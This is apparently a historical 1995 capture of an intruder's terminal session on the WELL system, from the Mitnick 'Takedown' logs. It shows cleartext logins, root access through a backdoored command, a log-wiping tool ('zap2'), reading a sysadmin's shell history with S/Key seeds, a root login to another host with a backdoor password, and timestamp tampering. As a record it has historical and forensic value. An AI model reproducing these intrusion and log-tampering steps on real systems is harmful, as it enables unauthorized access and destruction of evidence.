Kevin On Demand
- Who Or What Tipped Him Off? - kevin-on-demand.takedown.com 4027
- Start: 1995 Feb 14 13:56:34
- Total Run Time: 3:08
- From netcom4.netcom.com to well.sf.ca.us.
- About 8 hours before his arrest. Something has tipped him off about the Well, and he immediately heads for the files of the chief sysadmin, Pei. Checks to see if nkosi still has his back door.
UNIX(r) System V Release 4.0 (well)
This is the WELL
Type newuser to sign up.
Type trouble if you are having trouble logging in.
Type guest to learn about the WELL.
If you already have a WELL account, type your username.
login: dono
Password: no,panix
Welcome to the WELL
You own your own words. This means that you are responsible
for the words that you post on the WELL and that reproduction of those
words without your permission in any medium outside of the WELL's
conferencing system may be challenged by you, the author.
**As of 1/30/95 Default prompts on the WELL changed. If you use a program
**such as Eudora or Sweeper to login, then type extract news 1706 100
**NEW LOWER DISK STORAGE RATES EFFECTIVE FEBRUARY 1st. FOR MORE INFORMATION
**Type !extract news 867 18
You have mail.
well% newgrp -hack root
# ./zap2 dono
Zap2!
# ls
0108.gz hc11 newoki.tar.Z satan.tar.Z zap.c
4004 itool ns.c sendmail.tar.Z zap2
asm11 key2.zip nw.tar.Z sportd zap2.c
cloak kocher.tar.Z o.tar.Z sum zipcrack.zip
cloak.c log1 okitsu.tar.Z time zipcrypt.zip
cust.out.Z log2 oldctek.tar.Z unxor.c zipstuff.tar.Z
g.c mconnect.c oldnw.tar.Z zap
# csh
well# find . -exec chown dono {} \; &
[1] 175
well# grep hpc: /etc/passwd
well# cd /home/h/p/hpc
well# ls -tla | head
total 864
-rw------- 1 hpc staff 8444 Feb 14 13:58 .inbox
-rw------- 1 hpc well 3799 Feb 14 13:42 .history
drwxr-xr-x 17 hpc well 1536 Feb 14 13:41 .
-rw------- 1 hpc staff 1048 Feb 14 13:41 .Xauthority
-r-------- 1 hpc staff 44 Feb 14 13:41 .xsun.develop:0
drwx------ 3 hpc well 1536 Feb 13 21:30 Mail
drwx------ 2 hpc well 512 Feb 13 13:36 misc
-rw-r--r-- 1 hpc well 2929 Feb 13 08:35 ref
drwx------ 6 hpc well 512 Feb 9 02:49 src
[1] + Done find . -exec chown dono {} ;
well# cat .history
finger katz
exit
netstat -rn
stty erase ^?
csh
exit
setenv TERM vt100
csh
exit
csh
exit
csh
exit
csh
exit
df
df
cd /var
l
ls -la
du *
l
du adm audit cron local log lp preserve saf spool statmon uucp yp
l
cd
df
cd /var
l
cd
elm
elm
elm
elm
elm
csh
exit
su
exit
uptime
df
csh
exit
w
uptime
df
setenv TERM vt100
csh
exit
talk jpettitt
elm
df
uptime
l
top
su
exit
uptime
df
top
w
exit
csh
exit
pwd
cd /etc/rcS.d
l
cd
diff S30rootusr.sh /etc/rcS.d/S30rootusr.sh
diff S40standardmounts.sh /etc/rcS.d/S40standardmounts.sh
diff S50drvconfig /etc/rcS.d/S50drvconfig
diff S60devlinks /etc/rcS.d/S60devlinks
diff S70buildmnttab.sh /etc/rcS.d/S70buildmnttab.sh
diff rcS /etc/rcS
su
su
su
su
exit
elm
elm
elm
elm
elm
elm
ls -la /usr/bin/stty
elm
exit
man getpid
su - sysadmin
su - sysadmin
su - sysadmin
id
exit
grep sysadmin /etc/passwd
su
cd /usr/local/sysadmin/bin
l
./keyinit
ls -la
su
l
su
./keyinit sysroot
ls -la
su
more /etc/vfstab
more /etc/skeykeys
ls -la /etc/ske
ls -la /etc/skey
ls -la /etc/skeykeys
su
su
cd
su - sysadmin
su
su - sysadmin
su sysroot
ping ftp.uu.net
traceroute netcom.com
telnet cardio.ucsf.edu
exit
portuse -h
tail -f /var/adm/messages
more /etc/hosts
l
su sysr
su sysroot
su sysroot
exit
set path = ( $path /usr/local/sysadmin/bin )
key
key 69 de96199
su admroot
elm
exit
last.sun -f /var/log/ascend.wtmp | more
w
csh
exit
su sysroot
exit
uptime
csh
exit
login
telnet well
exit
openwin
exit
elm
exit
elm
finger katz
l
vi tk
csh
elm
elm
csh
exit
csh
exit
csh
exit
exit
last.sun -f /var/log/ascend.wtmp
wtmptoa /var/log/ascend.wtmp | more
exit
csh
exit
key 67 nk139000
clear
l
uptime
top
exit
elm
l
finger katz
l
exit
csh
exit
csh
exit
csh
exit
ping owl.ucsf.edu
telnet owl.ucsf.edu
ping cgl
ping cgl.ucsf.edu
telnet
exit
csh
exit
csh
exit
csh
l
exit
csh
exit
csh
exit
su sysroot
su sysroot
su - sysadmin
top
su admroot
su - sysadmin
uptime
elm
id
finger @neon.cchem.berkeley.edu
pwd
finger @neon.cchem.berkeley.edu
telnet opus.sdsc.edu
finger @neon.cchem.berkeley.edu
finger @neon.cchem.berkeley.edu
finger @neon.cchem.berkeley.edu
exit
ping well
exit
grep mgraham /etc/passwd
top
su admroot
key 8 de96199
key 8 de96199
elm
finger tpesce
finger btanaka
last scott
last dono
elm
elm
key 7 de96199
clear
exit
su - sysadmin
exit
su - sysadmin
exit
su - sysadmin
exit
su - sysadmin
exit
su - sysadmin
key -1 de961900
key -n -1 de961900
key 98 de961901
elm
exit
su - sysadmin
exit
elm
su admroot
exit
su - sysadmin
openwin
exit
su - sysadmin
su admroot
well# telent
telent: Command not found
well# telnet
telnet> open nkosi
Trying 198.93.4.11 ...
Connected to nkosi.
Escape character is '^]'.
SunOS UNIX (nkosi)
login: root
Password: .hackman
Last login: Wed Dec 31 16:00:00 from
SunOS Release 4.1.3_U1 (AT) #1: Tue May 24 15:46:24 PDT 1994
nkosi# ^D
logout
Connection closed by foreign host.
well# pwd
/home/h/p/hpc
well# pwd
/home/h/p/hpc
well# cd
well# cd
well# ls -tla
total 56708
drwxr-xr-x 4 dono well 2048 Feb 14 13:56 .
drw-r--r-- 2 dono well 512 Feb 14 13:56 hc11
-rwx------ 1 dono well 15284 Feb 13 16:52 sportd
drwxr-sr-x 98 root sys 2048 Feb 13 11:59 ..
-rw-rw-rw- 1 dono well 310707 Feb 11 22:13 satan.tar.Z
-rwxrwxrwx 1 dono well 314800 Feb 7 22:45 asm11
-rw-rw-rw- 1 dono well 18680 Feb 7 13:33 g.c
-rw------- 1 dono well 15631 Feb 5 23:02 .inbox
drwxrwxrwx 2 dono well 512 Feb 5 01:18 itool
-rw-rw-rw- 1 dono well 451297 Feb 5 00:12 cust.out.Z
-rw-r--r-- 1 dono other 999242 Feb 1 14:51 okitsu.tar.Z
-rw-r--r-- 1 dono other 1440017 Feb 1 14:51 newoki.tar.Z
-rw-rw-rw- 1 dono well 260032 Jan 29 20:10 sendmail.tar.Z
-rw-rw-rw- 1 dono well 2900 Jan 29 19:46 mconnect.c
-rw-r--r-- 1 dono well 0 Jan 26 18:02 .news_time
-rw-r--r-- 1 dono well 2255535 Jan 8 20:34 0108.gz
-rw------- 1 dono other 60 Dec 31 12:21 .rnlast
-rw------- 1 dono other 25 Dec 31 12:21 .newsrc
-rw------- 1 dono other 6 Dec 31 12:21 .rnlock
-rw-r--r-- 1 dono well 4076 Dec 31 00:21 cloak.c
-rw-r--r-- 1 dono well 16384 Dec 30 23:52 cloak
-rw-r--r-- 1 dono well 24576 Dec 28 10:33 log2
-rw-r--r-- 1 dono well 16384 Dec 15 23:29 sum
-rw-r--r-- 1 dono well 16384 Dec 15 23:02 zap
-rw-r--r-- 1 dono well 16384 Dec 15 23:02 time
-rw-r--r-- 1 dono well 24576 Dec 11 20:48 log1
-rw-r--r-- 1 dono well 13228 Dec 10 00:26 ns.c
-rw-r--r-- 1 dono well 637827 Dec 7 00:50 4004
-rw-r--r-- 1 dono well 257615 Dec 6 06:38 oldnw.tar.Z
-rw-r--r-- 1 dono well 184864 Dec 6 06:38 oldctek.tar.Z
-rw-r--r-- 1 dono well 8142621 Dec 5 04:26 nw.tar.Z
-rw-r--r-- 1 dono well 6813202 Dec 5 03:48 o.tar.Z
-rw-r--r-- 1 dono well 1755 Nov 29 22:13 zap.c
-rw-rw-rw- 1 dono well 59953 Nov 29 00:50 .lock
-rwxrwxrwx 1 dono well 10112 Nov 26 13:25 zap2
-rw-r--r-- 1 dono well 3390 Nov 26 13:25 zap2.c
-rw-r--r-- 1 dono well 50599 Nov 23 21:53 key2.zip
-rw-r--r-- 1 dono well 48786 Nov 23 01:33 zipcrypt.zip
-rw-r--r-- 1 dono well 136912 Nov 23 01:33 zipcrack.zip
-rw-r--r-- 1 dono well 297223 Nov 22 01:55 zipstuff.tar.Z
-rw-r--r-- 1 dono well 5947301 Nov 22 01:53 kocher.tar.Z
-rw-r--r-- 1 dono well 150 Oct 27 11:37 unxor.c
-rw-rw-rw- 1 dono well 43385 Oct 23 18:18 .record
-rw-r--r-- 1 dono well 11 Jun 12 1992 .cflist
-rw-r--r-- 1 dono well 139 Jun 12 1992 .plan
well# touch *